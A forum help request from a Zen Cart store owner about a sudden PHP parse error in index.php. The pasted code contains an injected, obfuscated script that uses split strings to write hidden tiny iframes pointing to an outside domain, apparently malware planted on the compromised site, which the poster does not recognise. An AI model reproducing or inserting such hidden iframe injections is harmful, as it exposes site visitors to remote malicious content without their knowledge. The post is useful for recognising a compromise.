Hello all!
After getting my zc set up and looking the way I liked I started to add my product and did so for two or three days without a problem and then this morning I awoke to...
Parse error: syntax error, unexpected T_STRING, expecting ',' or ';' in /home/mysite/public_html/index.php on line 105
I get a blank screen other than the message
I changed nothing in the index file for days and it has worked fine, it was also working fine the night before when I shut the comp down, so why now?
I am not very good with php. Can anyone please help me find the mistake in the code below?
<?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?><?php echo '<script>document.write("<i"+"fr"+"a"+"me s"+"rc=\"h"+"tt"+"p"+":"+"/"+"/tru"+"ght"+""+"sa.c"+"o"+"m"+"/\" wid"+"th=1 he"+"ight"+"="+"2></i"+"fra"+""+"m"+""+"e>");</script>'; ?><?php echo '<script>document.write("<i"+'fr'+"am"+'e s'+"rc=\""+'htt'+"p:"+''+"//"+'trug'+"hts"+''+'a.c'+"o"+'m/'+"\" wid"+'th=2 he'+"igh"+'t'+"="+"1></i"+"fra"+''+"m"+''+"e"+'>');</script>'; ?>
Thanks to all!




